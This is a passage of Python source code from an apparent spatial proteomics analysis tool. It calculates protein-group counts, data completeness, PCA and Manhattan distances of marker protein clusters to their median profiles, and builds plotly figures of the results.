log_histogram.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
return log_histogram
def quantity_profiles_proteinGroups(self):
"""
The number of profiles and protein groups per experiment, and the data completeness of profiles (total quantity, intersection) are calculated.
Args:
self:
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
df_index: multiindex dataframe, which contains 3 level labels: Map, Fraction, Type
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
Returns:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; containing the following information:
npg_t: protein groups per experiment total quantity
npgf_t = groups with valid profiles per experiment total quantity
npr_t: profiles with any valid values
nprf_t = total number of valid profiles
npg_i: protein groups per experiment intersection
npgf_i = groups with valid profiles per experiment intersection
npr_i: profiles with any valid values in the intersection
nprf_i = total number of valid profiles in the intersection
npr_t_dc: profiles, % values != nan
nprf_t_dc = profiles, total, filtered, % values != nan
npr_i_dc: profiles, intersection, % values != nan
nprf_i_dc = profiles, intersection, filtered, % values != nan
df_npg | df_npgf: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f = protein groups, per fraction
or npgf_f = protein groups, filtered, per fraction
df_npg_dc | df_npgf_dc: index: maps e.g. "Map1", "Map2",..., columns: fractions e.g. "03K", "06K", ...
npg_f_dc = protein groups, per fraction, % values != nan
or npgf_f_dc = protein groups, filtered, per fraction, % values != nan
"""
if self.acquisition == "SILAC - MQ":
df_index = self.df_index["Ratio H/L"]
df_01_stacked = self.df_01_stacked["normalized profile"]
elif self.acquisition.startswith("LFQ"):
df_index = self.df_index["LFQ intensity"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
elif self.acquisition == "Custom":
df_index = self.df_index["normalized profile"]
df_01_stacked = self.df_01_stacked["normalized profile"].replace(0, np.nan)
#unfiltered
npg_t = df_index.shape[0]
df_index_MapStacked = df_index.stack("Map")
npr_t = df_index_MapStacked.shape[0]/len(self.map_names)
npr_t_dc = 1-df_index_MapStacked.isna().sum().sum()/np.prod(df_index_MapStacked.shape)
#filtered
npgf_t = df_01_stacked.unstack(["Map", "Fraction"]).shape[0]
df_01_MapStacked = df_01_stacked.unstack("Fraction")
nprf_t = df_01_MapStacked.shape[0]/len(self.map_names)
nprf_t_dc = 1-df_01_MapStacked.isna().sum().sum()/np.prod(df_01_MapStacked.shape)
#unfiltered intersection
try:
df_index_intersection = df_index_MapStacked.groupby(level="Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_index_intersection = df_index_MapStacked.groupby(level="Protein IDs").filter(lambda x : len(x)==len(self.map_names))
npr_i = df_index_intersection.shape[0]/len(self.map_names)
npr_i_dc = 1-df_index_intersection.isna().sum().sum()/np.prod(df_index_intersection.shape)
npg_i = df_index_intersection.unstack("Map").shape[0]
#filtered intersection
try:
df_01_intersection = df_01_MapStacked.groupby(level = "Sequence").filter(lambda x : len(x)==len(self.map_names))
except:
df_01_intersection = df_01_MapStacked.groupby(level = "Protein IDs").filter(lambda x : len(x)==len(self.map_names))
nprf_i = df_01_intersection.shape[0]/len(self.map_names)
nprf_i_dc = 1-df_01_intersection.isna().sum().sum()/np.prod(df_01_intersection.shape)
npgf_i = df_01_intersection.unstack("Map").shape[0]
# summarize in dataframe and save to attribute
df_quantity_pr_pg = pd.DataFrame(
{
"filtering": pd.Series(["before filtering", "before filtering", "after filtering", "after filtering"], dtype=np.dtype("O")),
"type": pd.Series(["total", "intersection", "total", "intersection"], dtype=np.dtype("O")),
"number of protein groups": pd.Series([npg_t, npg_i, npgf_t, npgf_i], dtype=np.dtype("float")),
"number of profiles": pd.Series([npr_t, npr_i, nprf_t, nprf_i], dtype=np.dtype("float")),
"data completeness of profiles": pd.Series([npr_t_dc, npr_i_dc, nprf_t_dc, nprf_i_dc], dtype=np.dtype("float"))})
self.df_quantity_pr_pg = df_quantity_pr_pg.reset_index()
self.analysis_summary_dict["quantity: profiles/protein groups"] = self.df_quantity_pr_pg.to_json()
#additional depth assessment per fraction
dict_npgf = {}
dict_npg = {}
list_npg_dc = []
list_npgf_dc = []
for df_intersection in [df_index_intersection, df_01_intersection]:
for fraction in self.fractions:
df_intersection_frac = df_intersection[fraction]
npgF_f_dc = 1-df_intersection_frac.isna().sum()/len(df_intersection_frac)
npgF_f = df_intersection_frac.unstack("Map").isnull().sum(axis=1).value_counts()
if fraction not in dict_npg.keys():
dict_npg[fraction] = npgF_f
list_npg_dc.append(npgF_f_dc)
else:
dict_npgf[fraction] = npgF_f
list_npgf_dc.append(npgF_f_dc)
df_npg = pd.DataFrame(dict_npg)
df_npg.index.name = "Protein Groups present in:"
df_npg.rename_axis("Fraction", axis=1, inplace=True)
df_npg = df_npg.stack("Fraction").reset_index()
df_npg = df_npg.rename({0: "Protein Groups"}, axis=1)
df_npg.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
df_npgf = pd.DataFrame(dict_npgf)
df_npgf.index.name = "Protein Groups present in:"
df_npgf.rename_axis("Fraction", axis=1, inplace=True)
df_npgf = df_npgf.stack("Fraction").reset_index()
df_npgf = df_npgf.rename({0: "Protein Groups"}, axis=1)
df_npgf.sort_values(["Fraction", "Protein Groups present in:"], inplace=True, key=natsort_list_keys)
max_df_npg = df_npg["Protein Groups present in:"].max()
min_df_npg = df_npg["Protein Groups present in:"].min()
rename_numOFnans = {}
for x, y in zip(range(max_df_npg,min_df_npg-1, -1), range(max_df_npg+1)):
if y == 1:
rename_numOFnans[x] = "{} Map".format(y)
elif y == 0:
rename_numOFnans[x] = "PG not identified".format(y)
else:
rename_numOFnans[x] = "{} Maps".format(y)
for keys in rename_numOFnans.keys():
df_npg.loc[df_npg["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
df_npgf.loc[df_npgf["Protein Groups present in:"] ==keys, "Protein Groups present in:"] = rename_numOFnans[keys]
# summarize in dataframe and save to attributes
self.df_npg_dc = pd.DataFrame(
{
"Fraction" : pd.Series(self.fractions),
"Data completeness before filtering": pd.Series(list_npg_dc),
"Data completeness after filtering": pd.Series(list_npgf_dc),
})
self.df_npg = df_npg
self.df_npgf = df_npgf
def plot_quantity_profiles_proteinGroups(self):
"""
Args:
self:
df_quantity_pr_pg: df; no index, columns: "filtering", "type", "npg", "npr", "npr_dc"; further information: see above
Returns:
"""
df_quantity_pr_pg = self.df_quantity_pr_pg
layout = go.Layout(barmode="overlay",
xaxis_tickangle=90,
autosize=False,
width=300,
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
#title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
mirror=True),
template="simple_white")
fig_npg = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npg.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of protein groups"],
name=t))
fig_npg.update_layout(layout, title="Number of Protein Groups", yaxis=go.layout.YAxis(title="Protein Groups"))
fig_npr = go.Figure()
for t in df_quantity_pr_pg["type"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["type"] == t]
fig_npr.add_trace(go.Bar(
x=plot_df["filtering"],
y=plot_df["number of profiles"],
name=t))
fig_npr.update_layout(layout, title="Number of Profiles")
df_quantity_pr_pg = df_quantity_pr_pg.sort_values("filtering")
fig_npr_dc = go.Figure()
for t in df_quantity_pr_pg["filtering"].unique():
plot_df = df_quantity_pr_pg[df_quantity_pr_pg["filtering"] == t]
fig_npr_dc.add_trace(go.Bar(
x=plot_df["type"],
y=plot_df["data completeness of profiles"],
name=t))
fig_npr_dc.update_layout(layout, title="Coverage", yaxis=go.layout.YAxis(title="Data completeness"))
#fig_npr_dc.update_xaxes(tickangle=30)
fig_npg_F = px.bar(self.df_npg,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - before filtering",
width=500)
fig_npgf_F = px.bar(self.df_npgf,
x="Fraction",
y="Protein Groups",
color="Protein Groups present in:",
template="simple_white",
title = "Protein groups per fraction - after filtering",
width=500)
fig_npg_F_dc = go.Figure()
for data_type in ["Data completeness after filtering", "Data completeness before filtering"]:
fig_npg_F_dc.add_trace(go.Bar(
x=self.df_npg_dc["Fraction"],
y=self.df_npg_dc[data_type],
name=data_type))
fig_npg_F_dc.update_layout(layout, barmode="overlay", title="Data completeness per fraction", yaxis=go.layout.YAxis(title=""), height=450, width=600)
return fig_npg, fig_npr, fig_npr_dc, fig_npg_F, fig_npgf_F, fig_npg_F_dc
def perform_pca(self):
"""
PCA will be performed, using logarithmized data.
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], "V-type proton ATPase": [...], ...})
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "LFQ intensity"
and "Ratio H/L", respectively; additionally the columns "MS/MS count" and "Ratio H/L count|Ratio H/L variability [%]" are stored
as single level indices
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to "normalized
profile"; the columns "normalized profile"" and "MS/MS count" are stored as single level indices; plotting is possible now
Returns:
self:
df_pca: df, PCA was performed, while keeping the information of the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Map" "Compartment"
df_pca_combined: df, PCA was performed across the Maps
columns: "PC1", "PC2", "PC3"
index: "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "Q-value", "Score", "id", "Compartment"
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are consistent
throughout all maps / coverage filtering.
"""
markerproteins = self.markerproteins
if self.acquisition == "SILAC - MQ":
df_01orlog_fracunstacked = self.df_log_stacked["log profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_log_stacked["log profile"].unstack(["Fraction", "Map"]).dropna()
elif self.acquisition.startswith("LFQ") or self.acquisition == "Custom":
df_01orlog_fracunstacked = self.df_01_stacked["normalized profile"].unstack("Fraction").dropna()
df_01orlog_MapFracUnstacked = self.df_01_stacked["normalized profile"].unstack(["Fraction", "Map"]).dropna()
pca = PCA(n_components=3)
# df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3"
df_pca = pd.DataFrame(pca.fit_transform(df_01orlog_fracunstacked))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_01orlog_fracunstacked.index
self.df_pca = df_pca.sort_index(level=["Gene names", "Compartment"])
# df_pca_combined: PCA processed dataframe across the combined maps, containing the columns "PC1", "PC2", "PC3"
df_pca_combined = pd.DataFrame(pca.fit_transform(df_01orlog_MapFracUnstacked))
df_pca_combined.columns = ["PC1", "PC2", "PC3"]
df_pca_combined.index = df_01orlog_MapFracUnstacked.index
self.df_pca_combined = df_pca_combined.sort_index(level=["Gene names", "Compartment"])
map_names = self.map_names
df_pca_all_marker_cluster_maps = pd.DataFrame()
df_pca_filtered = df_pca.unstack("Map").dropna()
for clusters in markerproteins:
for marker in markerproteins[clusters]:
try:
plot_try_pca = df_pca_filtered.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.append(
plot_try_pca)
if len(df_pca_all_marker_cluster_maps) == 0:
df_pca_all_marker_cluster_maps = df_pca_filtered.stack("Map")
else:
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.stack("Map")
self.df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.sort_index(level=["Gene names", "Compartment"])
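# Hedged usage sketch (assumption): after processingdf() has populated df_log_stacked / df_01_stacked,
# a typical call order is
#   ds.perform_pca()
#   fig = ds.plot_global_pca(map_of_interest="Map1", x_PCA="PC1", y_PCA="PC3")
# Only the transformed coordinates (PC1-PC3) are stored on the instance; the fitted sklearn PCA
# object itself stays local to perform_pca.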
def plot_global_pca(self, map_of_interest="Map1", cluster_of_interest="Proteasome", x_PCA="PC1", y_PCA="PC3", collapse_maps=False):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3",
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Map", "Compartment",
Returns:
pca_figure: global PCA plot
"""
if collapse_maps == False:
df_global_pca = self.df_pca.unstack("Map").swaplevel(0,1, axis=1)[map_of_interest].reset_index()
else:
df_global_pca = self.df_pca_combined.reset_index()
for i in self.markerproteins[cluster_of_interest]:
df_global_pca.loc[df_global_pca["Gene names"] == i, "Compartment"] = "Selection"
compartments = self.df_organellarMarkerSet["Compartment"].unique()
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment",
color_discrete_map=compartment_color,
title= "Protein subcellular localization by PCA for {}".format(map_of_interest)
if collapse_maps == False else "Protein subcellular localization by PCA of combined maps",
hover_data=["Protein IDs", "Gene names", "Compartment"],
template="simple_white",
opacity=0.9
)
return fig_global_pca
def plot_cluster_pca(self, cluster_of_interest="Proteasome"):
"""
PCA plot will be generated
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are
consistent throughout all maps / coverage filtering.
Returns:
pca_figure: PCA plot, for one protein cluster all maps are plotted
"""
df_pca_all_marker_cluster_maps = self.df_pca_all_marker_cluster_maps
map_names = self.map_names
markerproteins = self.markerproteins
try:
for maps in map_names:
df_setofproteins_PCA = pd.DataFrame()
for marker in markerproteins[cluster_of_interest]:
try:
plot_try_pca = df_pca_all_marker_cluster_maps.xs((marker, maps), level=["Gene names", "Map"],
drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
if maps == map_names[0]:
pca_figure = go.Figure(
data=[go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
)])
else:
pca_figure.add_trace(go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
))
pca_figure.update_layout(autosize=False, width=500, height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest),
template="simple_white")
return pca_figure
except:
return "This protein cluster was not quantified"
def calc_biological_precision(self):
"""
This function calculates the biological precision of all quantified protein clusters. It provides access to the data slice for all marker proteins, the distance profiles and the aggregated distances. It repeatedly applies the methods get_marker_proteins_unfiltered and calc_cluster_distances.
TODO: integrate optional arguments for calc_cluster_distances: complex_profile, distance_measure.
TODO: replace compatibility attributes with function return values and adjust attribute usage in downstream plotting functions.
Args:
self attributes:
markerproteins: dict, contains marker protein assignments
df_01_stacked: df, contains 0-1 normalized data, required for execution of get_marker_proteins_unfiltered
Returns:
df_alldistances_individual_mapfracunstacked: df, distance profiles, fully unstacked
df_alldistances_aggregated_mapunstacked: df, profile distances (manhattan distance by default), fully unstacked
df_allclusters_01_unfiltered_mapfracunstacked: df, collected marker protein data
self attributes:
df_distance_noindex: compatibility version of df_alldistances_aggregated_mapunstacked
df_allclusters_01_unfiltered_mapfracunstacked
df_allclusters_clusterdist_fracunstacked_unfiltered: compatibility version of df_allclusters_01_unfiltered_mapfracunstacked (only used by quantification_overview)
df_allclusters_clusterdist_fracunstacked: compatibility version of df_alldistances_individual_mapfracunstacked
genenames_sortedout_list = list of gene names with incomplete coverage
analysis_summary_dict entries:
"Manhattan distances" = df_distance_noindex
"Distances to the median profile": df_allclusters_clusterdist_fracunstacked, sorted and melted
"""
df_alldistances_individual_mapfracunstacked = pd.DataFrame()
df_alldistances_aggregated_mapunstacked = pd.DataFrame()
df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame()
for cluster in self.markerproteins.keys():
# collect data irrespective of coverage
df_cluster_unfiltered = self.get_marker_proteins_unfiltered(cluster)
df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked.append(df_cluster_unfiltered)
# filter for coverage and calculate distances
df_cluster = df_cluster_unfiltered.dropna()
if len(df_cluster) == 0:
continue
df_distances_aggregated, df_distances_individual = self.calc_cluster_distances(df_cluster)
df_alldistances_individual_mapfracunstacked = df_alldistances_individual_mapfracunstacked.append(df_distances_individual)
df_alldistances_aggregated_mapunstacked = df_alldistances_aggregated_mapunstacked.append(df_distances_aggregated)
if len(df_alldistances_individual_mapfracunstacked) == 0:
self.df_distance_noindex = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_clusterdist_fracunstacked_unfiltered = pd.DataFrame(columns = ["Fraction"])
self.df_allclusters_clusterdist_fracunstacked = pd.DataFrame(columns = ["Fraction"])
self.genenames_sortedout_list = "No clusters found"
return pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
else:
df_alldistances_aggregated_mapunstacked.columns.name = "Map"
## Get compatibility with plotting functions, by mimicking assignment of old functions:
# old output of distance_calculation
self.df_distance_noindex = df_alldistances_aggregated_mapunstacked.stack("Map").reset_index().rename({0: "distance"}, axis=1)
self.analysis_summary_dict["Manhattan distances"] = self.df_distance_noindex.to_json()
# old output of multiple_iterations
# self.df_allclusters_clusterdist_fracunstacked_unfiltered --> this won't exist anymore, replaced by:
self.df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked
# kept for testing of quantification table:
self.df_allclusters_clusterdist_fracunstacked_unfiltered = df_allclusters_01_unfiltered_mapfracunstacked.stack("Map")
# same as before, but now already abs
self.df_allclusters_clusterdist_fracunstacked = df_alldistances_individual_mapfracunstacked.stack("Map")
df_dist_to_median = self.df_allclusters_clusterdist_fracunstacked.stack("Fraction")
df_dist_to_median.name = "distance"
df_dist_to_median = df_dist_to_median.reindex(index=natsort.natsorted(df_dist_to_median.index))
self.analysis_summary_dict["Distances to the median profile"] = df_dist_to_median.reset_index().to_json()
self.genenames_sortedout_list = [el for el in df_allclusters_01_unfiltered_mapfracunstacked.index.get_level_values("Gene names")
if el not in df_alldistances_individual_mapfracunstacked.index.get_level_values("Gene names")]
return df_alldistances_individual_mapfracunstacked, df_alldistances_aggregated_mapunstacked, df_allclusters_01_unfiltered_mapfracunstacked
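# Hedged usage sketch (assumption): the three returned frames can be inspected directly, e.g. to
# summarize the median profile distance per cluster and map:
#   _, df_agg, _ = ds.calc_biological_precision()
#   df_agg.stack("Map").groupby(level="Cluster").median()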
def get_marker_proteins_unfiltered(self, cluster):
"""
This function retrieves the 0-1 normalized data for any given protein cluster, unfiltered for coverage.
Args:
cluster: str, cluster name, should be one of self.markerproteins.keys()
self attributes:
df_01_stacked: df, contains the fully stacked 0-1 normalized data
markerproteins: dict, contains marker protein assignments
Returns:
df_cluster_unfiltered: df, unfiltered data for the selected cluster, maps and fractions are unstacked.
self attributes:
None
"""
df_in = self.df_01_stacked["normalized profile"].unstack("Fraction")
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster_unfiltered = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster_unfiltered = df_cluster_unfiltered.append(df_p)
if len(df_cluster_unfiltered) == 0:
return df_cluster_unfiltered
# Unstack maps and add Cluster to index
df_cluster_unfiltered = df_cluster_unfiltered.unstack("Map")
df_cluster_unfiltered.set_index(pd.Index(np.repeat(cluster, len(df_cluster_unfiltered)), name="Cluster"), append=True, inplace=True)
return df_cluster_unfiltered
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
"""
Calculates the absolute differences in each fraction and the profile distances relative to the center of a cluster.
Per default this is the manhattan distance to the median profile.
Args:
df_cluster: df, 0-1 normalized profiles of cluster members, should already be filtered for full coverage and be in full wide format.
complex_profile: fun, function provided to apply for calculating the reference profile, default: np.median.
distance_measure: str, selected distance measure to calculate. Currently only 'manhattan' is supported, everything else raises a ValueError.
self attributes:
None
Returns:
df_distances_aggregated: df, proteins x maps; if stacked, the distance column is currently named 0 but contains Manhattan distances.
df_distances_individual: df, same shape as df_cluster, but now with absolute differences to the reference.
self attributes:
None
"""
df_distances_aggregated = pd.DataFrame()
ref_profile = pd.DataFrame(df_cluster.apply(complex_profile, axis=0, result_type="expand")).T
df_distances_individual = df_cluster.apply(lambda x: np.abs(x-ref_profile.iloc[0,:]), axis=1)
# loop over maps
maps = set(df_cluster.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_cluster.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[m], index=df_cluster.index)
df_distances_aggregated = pd.concat([df_distances_aggregated, d_m], axis=1)
df_distances_aggregated.columns.set_names(names="Map", inplace=True)
return df_distances_aggregated, df_distances_individual
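# Hedged worked example of the Manhattan distance above (toy cluster, one map, three fractions):
#   member A profile: [0.5, 0.3, 0.2]
#   member B profile: [0.3, 0.3, 0.4]
#   median reference: [0.4, 0.3, 0.3]
#   distance(A) = |0.5-0.4| + |0.3-0.3| + |0.2-0.3| = 0.2, and distance(B) = 0.2 as well.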
def profiles_plot(self, map_of_interest="Map1", cluster_of_interest="Proteasome"):
"""
The function allows the plotting of filtered and normalized spatial proteomic data using plotly.express.
The median profile is also calculated based on the overlapping proteins. Profiles of proteins that are not quantified in all maps are dashed.
Args:
map_of_interest: str, must be in self.map_names
cluster_of_interest: str, must be in self.markerproteins.keys()
self attributes:
df_allclusters_01_unfiltered_mapfracunstacked: df, contains 0-1 normalized profiles for all markerproteins detected in any map
Returns:
abundance_profiles_and_median_figure: plotly line plot, displaying the relative abundance profiles.
"""
try:
df_setofproteins = self.df_allclusters_01_unfiltered_mapfracunstacked.xs(cluster_of_interest, level="Cluster", axis=0)
df_setofproteins_median = df_setofproteins.dropna().xs(map_of_interest, level="Map", axis=1).median(axis=0)
# fractions get sorted
df_setofproteins = df_setofproteins.xs(map_of_interest, level="Map", axis=1).stack("Fraction")
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins.name = "normalized profile"
# make it available for plotting
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins = df_setofproteins.reset_index()
abundance_profiles_figure = px.line(df_setofproteins,
x="Fraction",
y="normalized profile",
color="Gene names",
line_group="Sequence" if "Sequence" in df_setofproteins.columns else "Gene names",
template="simple_white",
title="Relative abundance profile for {} of <br>the protein cluster: {}".format(map_of_interest, cluster_of_interest)
)
df_setofproteins_median.name = "normalized profile"
#fractions get sorted
df_setofproteins_median = df_setofproteins_median.reindex(index=natsort.natsorted(df_setofproteins_median.index))
# make it available for plotting
df_setofproteins_median = df_setofproteins_median.reset_index()
df_setofproteins_median.insert(0, "Gene names", np.repeat("Median profile", len(df_setofproteins_median)))
abundance_profiles_and_median_figure = abundance_profiles_figure.add_scatter(x=df_setofproteins_median["Fraction"],
y=df_setofproteins_median["normalized profile"],
name="Median profile"
)
# dash lines for proteins that have insufficient coverage across maps
abundance_profiles_and_median_figure.for_each_trace(lambda x: x.update(line={"dash":"dash"}),
selector=lambda x: x.name in self.genenames_sortedout_list)
return abundance_profiles_and_median_figure
except:
return "This protein cluster was not quantified"
def quantification_overview(self, cluster_of_interest="Proteasome"):
"""
Args:
self.df_allclusters_clusterdist_fracunstacked_unfiltered
columns: 01K, 03K, 06K, 12K, 24K, 80K
index: Gene names, Protein IDs, C-Score, Q-value, Map, Compartment, Cluster
Returns:
df
"""
df_quantification_overview = self.df_allclusters_clusterdist_fracunstacked_unfiltered.xs(cluster_of_interest, level="Cluster", axis=0)\
[self.fractions[0]].unstack("Map")
if "Sequence" in df_quantification_overview.index.names:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i in ["Sequence","Gene names"]])
else:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i=="Gene names"])
df_quantification_overview = df_quantification_overview.notnull().replace({True: "x", False: "-"})
return df_quantification_overview
def distance_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for 1 desired cluster, and across all maps is generated displaying the distribution of the e.g.
Manhattan distance.
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex), index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
map_names = self.map_names
df_distance_noindex = self.df_distance_noindex
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
if "Sequence" in df_distance_map_cluster_gene_in_index.columns:
df_distance_map_cluster_gene_in_index.set_index("Sequence", append=True, inplace=True)
df_cluster_xmaps_distance_with_index = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_map_cluster_gene_in_index" and appended to the new dataframe df_cluster_xmaps_distance_with_index
for maps in map_names:
plot_try = df_distance_map_cluster_gene_in_index.xs((cluster_of_interest, maps),
level=["Cluster", "Map"], drop_level=False)
df_cluster_xmaps_distance_with_index = df_cluster_xmaps_distance_with_index.append(plot_try)
df_cluster_xmaps_distance_with_index["Combined Maps"] = "Combined Maps"
#number of proteins within one cluster
self.proteins_quantified_across_all_maps = df_cluster_xmaps_distance_with_index.unstack("Map").shape[0]
# index will be reset, required for plotting
df_cluster_xmaps_distance = df_cluster_xmaps_distance_with_index.reset_index()
distance_boxplot_figure = go.Figure()
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Map"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Combined Maps"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.update_layout(
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest),
autosize=False,
showlegend=False,
width=500,
height=500,
# black box around the graph
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
except:
self.cache_cluster_quantified = False
def distance_to_median_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for 1 desired cluster, across all maps and fractions is generated displaying the
distribution of the distance to the median. For each fraction, one box plot will be displayed.
Args:
self:
df_allclusters_clusterdist_fracunstacked: df with single-level columns, stored as attribute
(self.df_allclusters_clusterdist_fracunstacked), in which "Fraction" is unstacked. It contains only the
normalized data of individual protein clusters, subtracted by the median of the respective protein cluster
for each fraction.
map_names: individual map names are stored as an index
Returns:
distance_to_median_boxplot_figure: box plot. Along the x-axis the maps are shown, along the y-axis
the distances are plotted
"""
df_boxplot_manymaps = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_allclusters_clusterdist_fracunstacked" and appended to the new dataframe df_boxplot_manymaps
for maps in self.map_names:
plot_try = self.df_allclusters_clusterdist_fracunstacked.xs((cluster_of_interest, maps), level=["Cluster", "Map"], drop_level=False)
df_boxplot_manymaps = df_boxplot_manymaps.append(plot_try)
self.df_boxplot_manymaps = df_boxplot_manymaps
# index will be reset, required by px.box
df_boxplot_manymaps = abs(df_boxplot_manymaps.stack("Fraction"))
df_boxplot_manymaps.name = "distance"
df_boxplot_manymaps = df_boxplot_manymaps.reindex(index=natsort.natsorted(df_boxplot_manymaps.index))
df_boxplot_manymaps = df_boxplot_manymaps.reset_index()
# box plot will be generated, every fraction will be displayed in a single plot
distance_to_median_boxplot_figure = px.box(df_boxplot_manymaps,
x="Map",
y="distance",
facet_col="Fraction",
facet_col_wrap=2,
boxmode="overlay", height=900, width=700, points="all",
hover_name="Gene names",
template="simple_white",
title="Distribution of the distance to the median for <br>the protein cluster: {}".format(cluster_of_interest))
return distance_to_median_boxplot_figure
except:
return "This protein cluster was not quantified"
def dynamic_range(self):
"""
Dynamic range of each individual protein cluster (of the median profile) across all maps is calculated.
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...})
df_01_stacked: df, "Map" and "Fraction" are stacked; the data in the column "normalized profile" is used. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
self.analysis_summary_dict["Dynamic Range"]: json-serialized df, no index, columns: "Max", "Min", "Dynamic Range", "Cluster"
"""
df_setofproteins_allMaps = pd.DataFrame()
df_dynamicRange = pd.DataFrame()
